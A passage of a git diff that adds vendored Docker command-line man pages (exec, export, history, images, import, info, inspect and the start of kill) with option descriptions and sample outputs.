+    2016-07-25T17:30:14.825557616Z plugin pull ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest)
+    2016-07-25T17:30:14.888127370Z plugin enable ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest)
+
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+June 2015, updated by Brian Goff <cpuguy83@gmail.com>
+October 2015, updated by Mike Brown <mikebrow@gmail.com>
diff --git a/vendor/github.com/docker/docker/man/docker-exec.1.md b/vendor/github.com/docker/docker/man/docker-exec.1.md
new file mode 100644
index 0000000000..fe9c279e7e
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-exec.1.md
@@ -0,0 +1,71 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-exec - Run a command in a running container
+
+# SYNOPSIS
+**docker exec**
+[**-d**|**--detach**]
+[**--detach-keys**[=*[]*]]
+[**-e**|**--env**[=*[]*]]
+[**--help**]
+[**-i**|**--interactive**]
+[**--privileged**]
+[**-t**|**--tty**]
+[**-u**|**--user**[=*USER*]]
+CONTAINER COMMAND [ARG...]
+
+# DESCRIPTION
+
+Run a process in a running container.
+
+The command started using `docker exec` will only run while the container's primary
+process (`PID 1`) is running, and will not be restarted if the container is restarted.
+
+If the container is paused, then the `docker exec` command will wait until the
+container is unpaused, and then run
+
+# OPTIONS
+**-d**, **--detach**=*true*|*false*
+   Detached mode: run command in the background. The default is *false*.
+
+**--detach-keys**=""
+  Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-<value>` where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+
+**-e**, **--env**=[]
+   Set environment variables
+
+   This option allows you to specify arbitrary environment variables that are
+available for the command to be executed.
+
+**--help**
+  Print usage statement
+
+**-i**, **--interactive**=*true*|*false*
+   Keep STDIN open even if not attached. The default is *false*.
+
+**--privileged**=*true*|*false*
+   Give the process extended [Linux capabilities](http://man7.org/linux/man-pages/man7/capabilities.7.html)
+when running in a container. The default is *false*.
+
+   Without this flag, the process run by `docker exec` in a running container has
+the same capabilities as the container, which may be limited. Set
+`--privileged` to give all capabilities to the process.
+
+**-t**, **--tty**=*true*|*false*
+   Allocate a pseudo-TTY. The default is *false*.
+
+**-u**, **--user**=""
+   Sets the username or UID used and optionally the groupname or GID for the specified command.
+
+   The followings examples are all valid:
+   --user [user | user:group | uid | uid:gid | user:gid | uid:group ]
+
+   Without this argument the command will be run as root in the container.
+
+The **-t** option is incompatible with a redirection of the docker client
+standard input.
+
+# HISTORY
+November 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-export.1.md b/vendor/github.com/docker/docker/man/docker-export.1.md
new file mode 100644
index 0000000000..3d59e4788e
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-export.1.md
@@ -0,0 +1,46 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-export - Export the contents of a container's filesystem as a tar archive
+
+# SYNOPSIS
+**docker export**
+[**--help**]
+[**-o**|**--output**[=*""*]]
+CONTAINER
+
+# DESCRIPTION
+Export the contents of a container's filesystem using the full or shortened
+container ID or container name. The output is exported to STDOUT and can be
+redirected to a tar file.
+
+Stream to a file instead of STDOUT by using **-o**.
+
+# OPTIONS
+**--help**
+  Print usage statement
+  
+**-o**, **--output**=""
+  Write to a file, instead of STDOUT
+
+# EXAMPLES
+Export the contents of the container called angry_bell to a tar file
+called angry_bell.tar:
+
+    # docker export angry_bell > angry_bell.tar
+    # docker export --output=angry_bell-latest.tar angry_bell
+    # ls -sh angry_bell.tar
+    321M angry_bell.tar
+    # ls -sh angry_bell-latest.tar
+    321M angry_bell-latest.tar
+
+# See also
+**docker-import(1)** to create an empty filesystem image
+and import the contents of the tarball into it, then optionally tag it.
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+January 2015, updated by Joseph Kern (josephakern at gmail dot com)
diff --git a/vendor/github.com/docker/docker/man/docker-history.1.md b/vendor/github.com/docker/docker/man/docker-history.1.md
new file mode 100644
index 0000000000..91edefe25f
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-history.1.md
@@ -0,0 +1,52 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-history - Show the history of an image
+
+# SYNOPSIS
+**docker history**
+[**--help**]
+[**-H**|**--human**[=*true*]]
+[**--no-trunc**]
+[**-q**|**--quiet**]
+IMAGE
+
+# DESCRIPTION
+
+Show the history of when and how an image was created.
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+**-H**, **--human**=*true*|*false*
+    Print sizes and dates in human readable format. The default is *true*.
+
+**--no-trunc**=*true*|*false*
+   Don't truncate output. The default is *false*.
+
+**-q**, **--quiet**=*true*|*false*
+   Only show numeric IDs. The default is *false*.
+
+# EXAMPLES
+    $ docker history fedora
+    IMAGE          CREATED          CREATED BY                                      SIZE                COMMENT
+    105182bb5e8b   5 days ago       /bin/sh -c #(nop) ADD file:71356d2ad59aa3119d   372.7 MB
+    73bd853d2ea5   13 days ago      /bin/sh -c #(nop) MAINTAINER Lokesh Mandvekar   0 B
+    511136ea3c5a   10 months ago                                                    0 B                 Imported from -
+
+## Display comments in the image history
+The `docker commit` command has a **-m** flag for adding comments to the image. These comments will be displayed in the image history.
+
+    $ sudo docker history docker:scm
+    IMAGE               CREATED             CREATED BY                                      SIZE                COMMENT
+    2ac9d1098bf1        3 months ago        /bin/bash                                       241.4 MB            Added Apache to Fedora base image
+    88b42ffd1f7c        5 months ago        /bin/sh -c #(nop) ADD file:1fd8d7f9f6557cafc7   373.7 MB            
+    c69cab00d6ef        5 months ago        /bin/sh -c #(nop) MAINTAINER Lokesh Mandvekar   0 B                 
+    511136ea3c5a        19 months ago                                                       0 B                 Imported from -
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-images.1.md b/vendor/github.com/docker/docker/man/docker-images.1.md
new file mode 100644
index 0000000000..d7958d0dc4
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-images.1.md
@@ -0,0 +1,153 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-images - List images
+
+# SYNOPSIS
+**docker images**
+[**--help**]
+[**-a**|**--all**]
+[**--digests**]
+[**-f**|**--filter**[=*[]*]]
+[**--format**=*"TEMPLATE"*]
+[**--no-trunc**]
+[**-q**|**--quiet**]
+[REPOSITORY[:TAG]]
+
+# DESCRIPTION
+This command lists the images stored in the local Docker repository.
+
+By default, intermediate images, used during builds, are not listed. Some of the
+output, e.g., image ID, is truncated, for space reasons. However the truncated
+image ID, and often the first few characters, are enough to be used in other
+Docker commands that use the image ID. The output includes repository, tag, image
+ID, date created and the virtual size.
+
+The title REPOSITORY for the first title may seem confusing. It is essentially
+the image name. However, because you can tag a specific image, and multiple tags
+(image instances) can be associated with a single name, the name is really a
+repository for all tagged images of the same name. For example consider an image
+called fedora. It may be tagged with 18, 19, or 20, etc. to manage different
+versions.
+
+# OPTIONS
+**-a**, **--all**=*true*|*false*
+   Show all images (by default filter out the intermediate image layers). The default is *false*.
+
+**--digests**=*true*|*false*
+   Show image digests. The default is *false*.
+
+**-f**, **--filter**=[]
+   Filters the output based on these conditions:
+   - dangling=(true|false) - find unused images
+   - label=<key> or label=<key>=<value>
+   - before=(<image-name>[:tag]|<image-id>|<image@digest>)
+   - since=(<image-name>[:tag]|<image-id>|<image@digest>)
+
+**--format**="*TEMPLATE*"
+   Pretty-print images using a Go template.
+   Valid placeholders:
+      .ID - Image ID
+      .Repository - Image repository
+      .Tag - Image tag
+      .Digest - Image digest
+      .CreatedSince - Elapsed time since the image was created
+      .CreatedAt - Time when the image was created
+      .Size - Image disk size
+
+**--help**
+  Print usage statement
+
+**--no-trunc**=*true*|*false*
+   Don't truncate output. The default is *false*.
+
+**-q**, **--quiet**=*true*|*false*
+   Only show numeric IDs. The default is *false*.
+
+# EXAMPLES
+
+## Listing the images
+
+To list the images in a local repository (not the registry) run:
+
+    docker images
+
+The list will contain the image repository name, a tag for the image, and an
+image ID, when it was created and its virtual size. Columns: REPOSITORY, TAG,
+IMAGE ID, CREATED, and SIZE.
+
+The `docker images` command takes an optional `[REPOSITORY[:TAG]]` argument
+that restricts the list to images that match the argument. If you specify
+`REPOSITORY`but no `TAG`, the `docker images` command lists all images in the
+given repository.
+
+    docker images java
+
+The `[REPOSITORY[:TAG]]` value must be an "exact match". This means that, for example,
+`docker images jav` does not match the image `java`.
+
+If both `REPOSITORY` and `TAG` are provided, only images matching that
+repository and tag are listed.  To find all local images in the "java"
+repository with tag "8" you can use:
+
+    docker images java:8
+
+To get a verbose list of images which contains all the intermediate images
+used in builds use **-a**:
+
+    docker images -a
+
+Previously, the docker images command supported the --tree and --dot arguments,
+which displayed different visualizations of the image data. Docker core removed
+this functionality in the 1.7 version. If you liked this functionality, you can
+still find it in the third-party dockviz tool: https://github.com/justone/dockviz.
+
+## Listing images in a desired format
+
+When using the --format option, the image command will either output the data 
+exactly as the template declares or, when using the `table` directive, will 
+include column headers as well. You can use special characters like `\t` for
+inserting tab spacing between columns. 
+
+The following example uses a template without headers and outputs the ID and 
+Repository entries separated by a colon for all images:
+
+    docker images --format "{{.ID}}: {{.Repository}}"
+    77af4d6b9913: <none>
+    b6fa739cedf5: committ
+    78a85c484bad: ipbabble
+    30557a29d5ab: docker
+    5ed6274db6ce: <none>
+    746b819f315e: postgres
+    746b819f315e: postgres
+    746b819f315e: postgres
+    746b819f315e: postgres
+
+To list all images with their repository and tag in a table format you can use:
+
+    docker images --format "table {{.ID}}\t{{.Repository}}\t{{.Tag}}"
+    IMAGE ID            REPOSITORY                TAG
+    77af4d6b9913        <none>                    <none>
+    b6fa739cedf5        committ                   latest
+    78a85c484bad        ipbabble                  <none>
+    30557a29d5ab        docker                    latest
+    5ed6274db6ce        <none>                    <none>
+    746b819f315e        postgres                  9
+    746b819f315e        postgres                  9.3
+    746b819f315e        postgres                  9.3.5
+    746b819f315e        postgres                  latest
+
+Valid template placeholders are listed above.
+
+## Listing only the shortened image IDs
+
+Listing just the shortened image IDs. This can be useful for some automated
+tools.
+
+    docker images -q
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-import.1.md b/vendor/github.com/docker/docker/man/docker-import.1.md
new file mode 100644
index 0000000000..43d65efe6a
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-import.1.md
@@ -0,0 +1,72 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-import - Create an empty filesystem image and import the contents of the tarball (.tar, .tar.gz, .tgz, .bzip, .tar.xz, .txz) into it, then optionally tag it.
+
+# SYNOPSIS
+**docker import**
+[**-c**|**--change**[=*[]*]]
+[**-m**|**--message**[=*MESSAGE*]]
+[**--help**]
+file|URL|**-**[REPOSITORY[:TAG]]
+
+# OPTIONS
+**-c**, **--change**=[]
+   Apply specified Dockerfile instructions while importing the image
+   Supported Dockerfile instructions: `CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR`
+
+**--help**
+  Print usage statement
+
+**-m**, **--message**=""
+   Set commit message for imported image
+
+# DESCRIPTION
+Create a new filesystem image from the contents of a tarball (`.tar`,
+`.tar.gz`, `.tgz`, `.bzip`, `.tar.xz`, `.txz`) into it, then optionally tag it.
+
+
+# EXAMPLES
+
+## Import from a remote location
+
+    # docker import http://example.com/exampleimage.tgz example/imagerepo
+
+## Import from a local file
+
+Import to docker via pipe and stdin:
+
+    # cat exampleimage.tgz | docker import - example/imagelocal
+
+Import with a commit message. 
+
+    # cat exampleimage.tgz | docker import --message "New image imported from tarball" - exampleimagelocal:new
+
+Import to a Docker image from a local file.
+
+    # docker import /path/to/exampleimage.tgz 
+
+
+## Import from a local file and tag
+
+Import to docker via pipe and stdin:
+
+    # cat exampleimageV2.tgz | docker import - example/imagelocal:V-2.0
+
+## Import from a local directory
+
+    # tar -c . | docker import - exampleimagedir
+
+## Apply specified Dockerfile instructions while importing the image
+This example sets the docker image ENV variable DEBUG to true by default.
+
+    # tar -c . | docker import -c="ENV DEBUG true" - exampleimagedir
+
+# See also
+**docker-export(1)** to export the contents of a filesystem as a tar archive to STDOUT.
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-info.1.md b/vendor/github.com/docker/docker/man/docker-info.1.md
new file mode 100644
index 0000000000..bb7a8fb4c2
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-info.1.md
@@ -0,0 +1,187 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-info - Display system-wide information
+
+# SYNOPSIS
+**docker info**
+[**--help**]
+[**-f**|**--format**[=*FORMAT*]]
+
+# DESCRIPTION
+This command displays system wide information regarding the Docker installation.
+Information displayed includes the kernel version, number of containers and images.
+The number of images shown is the number of unique images. The same image tagged
+under different names is counted only once.
+
+If a format is specified, the given template will be executed instead of the
+default format. Go's **text/template** package
+describes all the details of the format.
+
+Depending on the storage driver in use, additional information can be shown, such
+as pool name, data file, metadata file, data space used, total data space, metadata
+space used, and total metadata space.
+
+The data file is where the images are stored and the metadata file is where the
+meta data regarding those images are stored. When run for the first time Docker
+allocates a certain amount of data space and meta data space from the space
+available on the volume where `/var/lib/docker` is mounted.
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+**-f**, **--format**=""
+  Format the output using the given Go template
+
+# EXAMPLES
+
+## Display Docker system information
+
+Here is a sample output for a daemon running on Ubuntu, using the overlay2
+storage driver:
+
+    $ docker -D info
+    Containers: 14
+     Running: 3
+     Paused: 1
+     Stopped: 10
+    Images: 52
+    Server Version: 1.13.0
+    Storage Driver: overlay2
+     Backing Filesystem: extfs
+     Supports d_type: true
+     Native Overlay Diff: false
+    Logging Driver: json-file
+    Cgroup Driver: cgroupfs
+    Plugins:
+     Volume: local
+     Network: bridge host macvlan null overlay
+    Swarm: active
+     NodeID: rdjq45w1op418waxlairloqbm
+     Is Manager: true
+     ClusterID: te8kdyw33n36fqiz74bfjeixd
+     Managers: 1
+     Nodes: 2
+     Orchestration:
+      Task History Retention Limit: 5
+     Raft:
+      Snapshot Interval: 10000
+      Number of Old Snapshots to Retain: 0
+      Heartbeat Tick: 1
+      Election Tick: 3
+     Dispatcher:
+      Heartbeat Period: 5 seconds
+     CA Configuration:
+      Expiry Duration: 3 months
+     Node Address: 172.16.66.128 172.16.66.129
+     Manager Addresses:
+      172.16.66.128:2477
+    Runtimes: runc
+    Default Runtime: runc
+    Init Binary: docker-init
+    containerd version: 8517738ba4b82aff5662c97ca4627e7e4d03b531
+    runc version: ac031b5bf1cc92239461125f4c1ffb760522bbf2
+    init version: N/A (expected: v0.13.0)
+    Security Options:
+     apparmor
+     seccomp
+      Profile: default
+    Kernel Version: 4.4.0-31-generic
+    Operating System: Ubuntu 16.04.1 LTS
+    OSType: linux
+    Architecture: x86_64
+    CPUs: 2
+    Total Memory: 1.937 GiB
+    Name: ubuntu
+    ID: H52R:7ZR6:EIIA:76JG:ORIY:BVKF:GSFU:HNPG:B5MK:APSC:SZ3Q:N326
+    Docker Root Dir: /var/lib/docker
+    Debug Mode (client): true
+    Debug Mode (server): true
+     File Descriptors: 30
+     Goroutines: 123
+     System Time: 2016-11-12T17:24:37.955404361-08:00
+     EventsListeners: 0
+    Http Proxy: http://test:test@proxy.example.com:8080
+    Https Proxy: https://test:test@proxy.example.com:8080
+    No Proxy: localhost,127.0.0.1,docker-registry.somecorporation.com
+    Registry: https://index.docker.io/v1/
+    WARNING: No swap limit support
+    Labels:
+     storage=ssd
+     staging=true
+    Experimental: false
+    Insecure Registries:
+     127.0.0.0/8
+    Registry Mirrors:
+      http://192.168.1.2/
+      http://registry-mirror.example.com:5000/
+    Live Restore Enabled: false
+
+
+
+The global `-D` option tells all `docker` commands to output debug information.
+
+The example below shows the output for a daemon running on Red Hat Enterprise Linux,
+using the devicemapper storage driver. As can be seen in the output, additional
+information about the devicemapper storage driver is shown:
+
+    $ docker info
+    Containers: 14
+     Running: 3
+     Paused: 1
+     Stopped: 10
+    Untagged Images: 52
+    Server Version: 1.10.3
+    Storage Driver: devicemapper
+     Pool Name: docker-202:2-25583803-pool
+     Pool Blocksize: 65.54 kB
+     Base Device Size: 10.74 GB
+     Backing Filesystem: xfs
+     Data file: /dev/loop0
+     Metadata file: /dev/loop1
+     Data Space Used: 1.68 GB
+     Data Space Total: 107.4 GB
+     Data Space Available: 7.548 GB
+     Metadata Space Used: 2.322 MB
+     Metadata Space Total: 2.147 GB
+     Metadata Space Available: 2.145 GB
+     Udev Sync Supported: true
+     Deferred Removal Enabled: false
+     Deferred Deletion Enabled: false
+     Deferred Deleted Device Count: 0
+     Data loop file: /var/lib/docker/devicemapper/devicemapper/data
+     Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata
+     Library Version: 1.02.107-RHEL7 (2015-12-01)
+    Execution Driver: native-0.2
+    Logging Driver: json-file
+    Plugins:
+     Volume: local
+     Network: null host bridge
+    Kernel Version: 3.10.0-327.el7.x86_64
+    Operating System: Red Hat Enterprise Linux Server 7.2 (Maipo)
+    OSType: linux
+    Architecture: x86_64
+    CPUs: 1
+    Total Memory: 991.7 MiB
+    Name: ip-172-30-0-91.ec2.internal
+    ID: I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S
+    Docker Root Dir: /var/lib/docker
+    Debug mode (client): false
+    Debug mode (server): false
+    Username: gordontheturtle
+    Registry: https://index.docker.io/v1/
+    Insecure registries:
+     myinsecurehost:5000
+     127.0.0.0/8
+
+You can also specify the output format:
+
+    $ docker info --format '{{json .}}'
+	{"ID":"I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S","Containers":14, ...}
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-inspect.1.md b/vendor/github.com/docker/docker/man/docker-inspect.1.md
new file mode 100644
index 0000000000..21d7ba678a
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-inspect.1.md
@@ -0,0 +1,323 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-inspect - Return low-level information on docker objects
+
+# SYNOPSIS
+**docker inspect**
+[**--help**]
+[**-f**|**--format**[=*FORMAT*]]
+[**-s**|**--size**]
+[**--type**=*container*|*image*|*network*|*node*|*service*|*task*|*volume*]
+NAME|ID [NAME|ID...]
+
+# DESCRIPTION
+
+This displays the low-level information on Docker object(s) (e.g. container, 
+image, volume,network, node, service, or task) identified by name or ID. By default,
+this will render all results in a JSON array. If the container and image have
+the same name, this will return container JSON for unspecified type. If a format
+is specified, the given template will be executed for each result.
+
+# OPTIONS
+**--help**
+    Print usage statement
+
+**-f**, **--format**=""
+    Format the output using the given Go template
+
+**-s**, **--size**
+    Display total file sizes if the type is container
+
+**--type**=*container*|*image*|*network*|*node*|*service*|*task*|*volume*
+    Return JSON for specified type, permissible values are "image", "container",
+    "network", "node", "service", "task", and "volume"
+
+# EXAMPLES
+
+Get information about an image when image name conflicts with the container name,
+e.g. both image and container are named rhel7:
+
+    $ docker inspect --type=image rhel7
+    [
+    {
+     "Id": "fe01a428b9d9de35d29531e9994157978e8c48fa693e1bf1d221dffbbb67b170",
+     "Parent": "10acc31def5d6f249b548e01e8ffbaccfd61af0240c17315a7ad393d022c5ca2",
+     ....
+    }
+    ]
+
+## Getting information on a container
+
+To get information on a container use its ID or instance name:
+
+    $ docker inspect d2cc496561d6
+    [{
+    "Id": "d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47",
+    "Created": "2015-06-08T16:18:02.505155285Z",
+    "Path": "bash",
+    "Args": [],
+    "State": {
+        "Running": false,
+        "Paused": false,
+        "Restarting": false,
+        "OOMKilled": false,
+        "Dead": false,
+        "Pid": 0,
+        "ExitCode": 0,
+        "Error": "",
+        "StartedAt": "2015-06-08T16:18:03.643865954Z",
+        "FinishedAt": "2015-06-08T16:57:06.448552862Z"
+    },
+    "Image": "ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4",
+    "NetworkSettings": {
+        "Bridge": "",
+        "SandboxID": "6b4851d1903e16dd6a567bd526553a86664361f31036eaaa2f8454d6f4611f6f",
+        "HairpinMode": false,
+        "LinkLocalIPv6Address": "",
+        "LinkLocalIPv6PrefixLen": 0,
+        "Ports": {},
+        "SandboxKey": "/var/run/docker/netns/6b4851d1903e",
+        "SecondaryIPAddresses": null,
+        "SecondaryIPv6Addresses": null,
+        "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d",
+        "Gateway": "172.17.0.1",
+        "GlobalIPv6Address": "",
+        "GlobalIPv6PrefixLen": 0,
+        "IPAddress": "172.17.0.2",
+        "IPPrefixLen": 16,
+        "IPv6Gateway": "",
+        "MacAddress": "02:42:ac:12:00:02",
+        "Networks": {
+            "bridge": {
+                "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+                "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d",
+                "Gateway": "172.17.0.1",
+                "IPAddress": "172.17.0.2",
+                "IPPrefixLen": 16,
+                "IPv6Gateway": "",
+                "GlobalIPv6Address": "",
+                "GlobalIPv6PrefixLen": 0,
+                "MacAddress": "02:42:ac:12:00:02"
+            }
+        }
+
+    },
+    "ResolvConfPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/resolv.conf",
+    "HostnamePath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/hostname",
+    "HostsPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/hosts",
+    "LogPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47-json.log",
+    "Name": "/adoring_wozniak",
+    "RestartCount": 0,
+    "Driver": "devicemapper",
+    "MountLabel": "",
+    "ProcessLabel": "",
+    "Mounts": [
+      {
+        "Source": "/data",
+        "Destination": "/data",
+        "Mode": "ro,Z",
+        "RW": false
+	"Propagation": ""
+      }
+    ],
+    "AppArmorProfile": "",
+    "ExecIDs": null,
+    "HostConfig": {
+        "Binds": null,
+        "ContainerIDFile": "",
+        "Memory": 0,
+        "MemorySwap": 0,
+        "CpuShares": 0,
+        "CpuPeriod": 0,
+        "CpusetCpus": "",
+        "CpusetMems": "",
+        "CpuQuota": 0,
+        "BlkioWeight": 0,
+        "OomKillDisable": false,
+        "Privileged": false,
+        "PortBindings": {},
+        "Links": null,
+        "PublishAllPorts": false,
+        "Dns": null,
+        "DnsSearch": null,
+        "DnsOptions": null,
+        "ExtraHosts": null,
+        "VolumesFrom": null,
+        "Devices": [],
+        "NetworkMode": "bridge",
+        "IpcMode": "",
+        "PidMode": "",
+        "UTSMode": "",
+        "CapAdd": null,
+        "CapDrop": null,
+        "RestartPolicy": {
+            "Name": "no",
+            "MaximumRetryCount": 0
+        },
+        "SecurityOpt": null,
+        "ReadonlyRootfs": false,
+        "Ulimits": null,
+        "LogConfig": {
+            "Type": "json-file",
+            "Config": {}
+        },
+        "CgroupParent": ""
+    },
+    "GraphDriver": {
+        "Name": "devicemapper",
+        "Data": {
+            "DeviceId": "5",
+            "DeviceName": "docker-253:1-2763198-d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47",
+            "DeviceSize": "171798691840"
+        }
+    },
+    "Config": {
+        "Hostname": "d2cc496561d6",
+        "Domainname": "",
+        "User": "",
+        "AttachStdin": true,
+        "AttachStdout": true,
+        "AttachStderr": true,
+        "ExposedPorts": null,
+        "Tty": true,
+        "OpenStdin": true,
+        "StdinOnce": true,
+        "Env": null,
+        "Cmd": [
+            "bash"
+        ],
+        "Image": "fedora",
+        "Volumes": null,
+        "VolumeDriver": "",
+        "WorkingDir": "",
+        "Entrypoint": null,
+        "NetworkDisabled": false,
+        "MacAddress": "",
+        "OnBuild": null,
+        "Labels": {},
+        "Memory": 0,
+        "MemorySwap": 0,
+        "CpuShares": 0,
+        "Cpuset": "",
+        "StopSignal": "SIGTERM"
+    }
+    }
+    ]
+## Getting the IP address of a container instance
+
+To get the IP address of a container use:
+
+    $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' d2cc496561d6
+    172.17.0.2
+
+## Listing all port bindings
+
+One can loop over arrays and maps in the results to produce simple text
+output:
+
+    $ docker inspect --format='{{range $p, $conf := .NetworkSettings.Ports}} \
+      {{$p}} -> {{(index $conf 0).HostPort}} {{end}}' d2cc496561d6
+      80/tcp -> 80
+
+You can get more information about how to write a Go template from:
+https://golang.org/pkg/text/template/.
+
+## Getting size information on a container
+
+    $ docker inspect -s d2cc496561d6
+    [
+    {
+    ....
+    "SizeRw": 0,
+    "SizeRootFs": 972,
+    ....
+    }
+    ]
+
+## Getting information on an image
+
+Use an image's ID or name (e.g., repository/name[:tag]) to get information
+about the image:
+
+    $ docker inspect ded7cd95e059
+    [{
+    "Id": "ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4",
+    "Parent": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731",
+    "Comment": "",
+    "Created": "2015-05-27T16:58:22.937503085Z",
+    "Container": "76cf7f67d83a7a047454b33007d03e32a8f474ad332c3a03c94537edd22b312b",
+    "ContainerConfig": {
+        "Hostname": "76cf7f67d83a",
+        "Domainname": "",
+        "User": "",
+        "AttachStdin": false,
+        "AttachStdout": false,
+        "AttachStderr": false,
+        "ExposedPorts": null,
+        "Tty": false,
+        "OpenStdin": false,
+        "StdinOnce": false,
+        "Env": null,
+        "Cmd": [
+            "/bin/sh",
+            "-c",
+            "#(nop) ADD file:4be46382bcf2b095fcb9fe8334206b584eff60bb3fad8178cbd97697fcb2ea83 in /"
+        ],
+        "Image": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731",
+        "Volumes": null,
+        "VolumeDriver": "",
+        "WorkingDir": "",
+        "Entrypoint": null,
+        "NetworkDisabled": false,
+        "MacAddress": "",
+        "OnBuild": null,
+        "Labels": {}
+    },
+    "DockerVersion": "1.6.0",
+    "Author": "Lokesh Mandvekar \u003clsm5@fedoraproject.org\u003e",
+    "Config": {
+        "Hostname": "76cf7f67d83a",
+        "Domainname": "",
+        "User": "",
+        "AttachStdin": false,
+        "AttachStdout": false,
+        "AttachStderr": false,
+        "ExposedPorts": null,
+        "Tty": false,
+        "OpenStdin": false,
+        "StdinOnce": false,
+        "Env": null,
+        "Cmd": null,
+        "Image": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731",
+        "Volumes": null,
+        "VolumeDriver": "",
+        "WorkingDir": "",
+        "Entrypoint": null,
+        "NetworkDisabled": false,
+        "MacAddress": "",
+        "OnBuild": null,
+        "Labels": {}
+    },
+    "Architecture": "amd64",
+    "Os": "linux",
+    "Size": 186507296,
+    "VirtualSize": 186507296,
+    "GraphDriver": {
+        "Name": "devicemapper",
+        "Data": {
+            "DeviceId": "3",
+            "DeviceName": "docker-253:1-2763198-ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4",
+            "DeviceSize": "171798691840"
+        }
+    }
+    }
+    ]
+
+# HISTORY
+April 2014, originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+April 2015, updated by Qiang Huang <h.huangqiang@huawei.com>
+October 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-kill.1.md b/vendor/github.com/docker/docker/man/docker-kill.1.md
new file mode 100644
index 0000000000..36cbdb90ea
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-kill.1.md
@@ -0,0 +1,28 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-kill - Kill a running container using SIGKILL or a specified signal
+
+# SYNOPSIS
+**docker kill**
+[**--help**]
+[**-s**|**--signal**[=*"KILL"*]]
+CONTAINER [CONTAINER...]
+
+# DESCRIPTION
+
+The main process inside each container specified will be sent SIGKILL,
+ or any signal specified with option --signal.
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+**-s**, **--signal**="*KILL*"
